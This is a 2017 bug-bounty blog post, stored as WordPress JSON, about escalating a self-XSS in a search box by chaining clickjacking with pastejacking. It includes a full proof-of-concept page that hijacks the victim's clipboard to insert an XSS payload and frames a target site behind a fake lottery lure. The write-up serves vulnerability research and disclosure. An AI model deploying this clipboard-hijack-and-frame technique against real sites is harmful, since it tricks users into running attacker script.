{"id":512,"date":"2017-11-17T17:58:42","date_gmt":"2017-11-17T12:28:42","guid":{"rendered":"http:\/\/www.geekboy.ninja\/blog\/?p=512"},"modified":"2017-11-17T18:05:30","modified_gmt":"2017-11-17T12:35:30","slug":"cross-site-scripting-for-fun-pastejacking","status":"publish","type":"post","link":"https:\/\/www.geekboy.ninja\/blog\/cross-site-scripting-for-fun-pastejacking\/","title":{"rendered":"Cross Site Scripting for Fun: PasteJacking"},"content":{"rendered":"<p>Hi Everyone,<\/p>\n<p>A few weeks ago I found an issue which initially looks like unexploitable, it was <strong>Self XSS<\/strong> again, this time in <strong>Search Box<\/strong> where users can search for books\/documents, XSS get triggered once we type\/paste our payload in search box via Applications AutoSuggestion feature, but once search get completed it gets blocked by WAF at the backend, so only way to trigger XSS was AutoSuggestion feature which only can be done by user himself, so we cant do anything fancy here like <a href=\"https:\/\/www.geekboy.ninja\/blog\/airbnb-bug-bounty-turning-self-xss-into-good-xss-2\/\">THIS<\/a>.<\/p>\n<p><strong>Possible Exploitation?<\/strong><\/p>\n<p>Chaining this with <strong>ClickJacking<\/strong>, Right? I was lucky enough as the application had a strange behavior where they set <strong>X-Frame-Options<\/strong> for the non-authenticated users but not for authenticated users.<\/p>\n<p><em>TIP: Look for those headers on every part of the application.<\/em><\/p>\n<p>So I checked all the possible and more convening ways to chain this, and here are some ways we can do it.<\/p>\n<ul>\n<li><strong>Copy Paste<\/strong><\/li>\n<li><strong>Drag and Drop<\/strong><\/li>\n<li><strong>PasteJacking<\/strong><\/li>\n<\/ul>\n<p><span style=\"text-decoration: underline;\"><em><strong>Copy Paste:<\/strong><\/em><\/span><\/p>\n<p>In this, we simply ask the victim to copy paste the payload from our hosted page to framed page, which is not quite convincing.<\/p>\n<p><span style=\"text-decoration: underline;\"><em><strong>Drag and Drop:<\/strong><\/em><\/span><\/p>\n<p>In this, we can hide our payload behind images or anything are convince the victim to drag and drop the object to the framed page, which is good vector indeed but didn&#8217;t work in my case, as typing or pasting is the only way to trigger the XSS.<\/p>\n<p><strong>Reference:<\/strong><\/p>\n<ol>\n<li><a href=\"http:\/\/c0rni3sm.blogspot.in\/2016\/04\/drag-drop-xss-in-google.html\" rel=\"noopener\">http:\/\/c0rni3sm.blogspot.in\/2016\/04\/drag-drop-xss-in-google.html<\/a><\/li>\n<li><a href=\"https:\/\/vishwarajbhattrai.wordpress.com\/2016\/02\/04\/exploiting-self-xss\/\" rel=\"noopener\">https:\/\/vishwarajbhattrai.wordpress.com\/2016\/02\/04\/exploiting-self-xss\/<\/a><\/li>\n<li><a href=\"https:\/\/gist.github.com\/vishwaraj\/340435945e61027009133b4e11283750\" rel=\"noopener\">Python script to generate POC<\/a> for Drag and Drop XSS.<\/li>\n<\/ol>\n<p><em><span style=\"text-decoration: underline;\"><strong>PasteJacking<\/strong><\/span><\/em><\/p>\n<p>This is what I used to for my submission which is quite convincing for me, here <strong>we can control the clipboard of victim via JavaScirpt<\/strong>, and once he copied the object which can be anything, the attacker can set anything on the clipboard of the victim, so I used to set as XSS payload.<\/p>\n<p><strong>Reference:<\/strong><\/p>\n<p>1. <a href=\"https:\/\/github.com\/dxa4481\/Pastejacking\" rel=\"noopener\">https:\/\/github.com\/dxa4481\/Pastejacking<\/a><\/p>\n<p>So I decided to choose <strong>PasteJacking<\/strong> to exploit this <strong>Self-XSS<\/strong> and this how it looks like<\/p>\n<p><a href=\"http:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2017\/11\/CJ-XSS.png\"><img loading=\"lazy\" class=\"aligncenter size-full wp-image-516\" src=\"http:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2017\/11\/CJ-XSS.png\" alt=\"\" width=\"491\" height=\"471\" srcset=\"https:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2017\/11\/CJ-XSS.png 491w, https:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2017\/11\/CJ-XSS-300x288.png 300w\" sizes=\"(max-width: 491px) 100vw, 491px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><em>TIP: You can use: <a href=\"http:\/\/samy.pl\/quickjack\/quickjack.html\" target=\"_blank\" rel=\"noopener\">http:\/\/samy.pl\/quickjack\/quickjack.html<\/a> for framing\/slicing desired section of the page.<\/em><\/p>\n<p><strong>Poc Code:<br \/>\n<\/strong><\/p>\n<pre class=\"lang:default decode:true\">&lt;html&gt;\r\n&lt;title&gt;ClickJacking Lottery Game POC&lt;\/title&gt;\r\n&lt;body&gt;&lt;center&gt;\r\n&lt;h1&gt;ClickJacking Lottery Game&lt;\/h1&gt;\r\n\r\n&lt;b&gt;&lt;p&gt;Can you copy me ?&lt;\/p&gt;&lt;b&gt;\r\n&lt;script&gt;\r\nfunction copyTextToClipboard(text) {\r\nvar textArea = document.createElement(\"textarea\");\r\n\r\n\/\/\r\n\/\/ *** This styling is an extra step which is likely not required. ***\r\n\/\/\r\n\/\/ Why is it here? To ensure:\r\n\/\/ 1. the element is able to have focus and selection.\r\n\/\/ 2. if element was to flash render it has minimal visual impact.\r\n\/\/ 3. less flakyness with selection and copying which **might** occur if\r\n\/\/ the textarea element is not visible.\r\n\/\/\r\n\/\/ The likelihood is the element won't even render, not even a flash,\r\n\/\/ so some of these are just precautions. However in IE the element\r\n\/\/ is visible whilst the popup box asking the user for permission for\r\n\/\/ the web page to copy to the clipboard.\r\n\/\/\r\n\r\n\/\/ Place in top-left corner of screen regardless of scroll position.\r\ntextArea.style.position = 'fixed';\r\ntextArea.style.top = 0;\r\ntextArea.style.left = 0;\r\n\r\n\/\/ Ensure it has a small width and height. Setting to 1px \/ 1em\r\n\/\/ doesn't work as this gives a negative w\/h on some browsers.\r\ntextArea.style.width = '2em';\r\ntextArea.style.height = '2em';\r\n\r\n\/\/ We don't need padding, reducing the size if it does flash render.\r\ntextArea.style.padding = 0;\r\n\r\n\/\/ Clean up any borders.\r\ntextArea.style.border = 'none';\r\ntextArea.style.outline = 'none';\r\ntextArea.style.boxShadow = 'none';\r\n\r\n\/\/ Avoid flash of white box if rendered for any reason.\r\ntextArea.style.background = 'transparent';\r\n\r\n\r\ntextArea.value = text;\r\n\r\ndocument.body.appendChild(textArea);\r\n\r\ntextArea.select();\r\n\r\ntry {\r\nvar successful = document.execCommand('copy');\r\nvar msg = successful ? 'successful' : 'unsuccessful';\r\nconsole.log('Copying text command was ' + msg);\r\n} catch (err) {\r\nconsole.log('Oops, unable to copy');\r\n}\r\n\r\ndocument.body.removeChild(textArea);\r\n}\r\n\r\ndocument.addEventListener('keydown', function(event) {\r\nvar ms = 100;\r\nvar start = new Date().getTime();\r\nvar end = start;\r\nwhile(end &lt; start + ms) {\r\nend = new Date().getTime();\r\n}\r\ncopyTextToClipboard('&lt;img src=x onerror=confirm(document.domain)&gt;');\r\n});\r\n\r\n&lt;\/script&gt;\r\n\r\n\r\n&lt;script&gt;function t(e){window.setTimeout(\"stop();\",10);}window.onbeforeunload=t;var frames=new Array();&lt;\/script&gt;\r\n&lt;div qjid=\"quickjack\" style=\"overflow: hidden; width: 304px; height: 38px; position: relative;\" id=\"cksl6\"&gt;\r\n&lt;iframe name=\"cksl7\" src=\"https:\/\/www.target.com\/home\" style=\"border: 0pt none ; left: -875px; top: -8px; position: absolute; width: 1920px; height: 971px;\" scrolling=\"no\"&gt;&lt;\/iframe&gt;&lt;\/div&gt;\r\n&amp;#8593; &amp;#8593; &amp;#8593; &amp;#8593; &amp;#8593; &amp;#8593; &lt;br&gt;&lt;br&gt;\r\n&lt;b&gt;Paste here to WIN :) &lt;b&gt;<\/pre>\n<p><strong>Limitations:<\/strong><\/p>\n<p>For exploiting issues similar to this, the application should be vulnerable for the ClickJacking.<\/p>\n<p>Do let me know in comments if you exploited similar issues in more interesting ways, for any query comment or <a href=\"https:\/\/twitter.com\/emgeekboy\">twitter<\/a> it, and yes <strong>don&#8217;t copy paste blindly anything from the internet<\/strong>.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi Everyone, A few weeks ago I found an issue which initially looks like unexploitable, it was Self XSS again, this time in Search Box where users can search for books\/documents, XSS get triggered once we type\/paste our payload in search box via Applications AutoSuggestion feature, but once search get completed it gets blocked by [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":528,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[23,24,22,25],"_links":{"self":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/512"}],"collection":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/comments?post=512"}],"version-history":[{"count":24,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/512\/revisions"}],"predecessor-version":[{"id":538,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/512\/revisions\/538"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/media\/528"}],"wp:attachment":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/media?parent=512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/categories?post=512"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/tags?post=512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}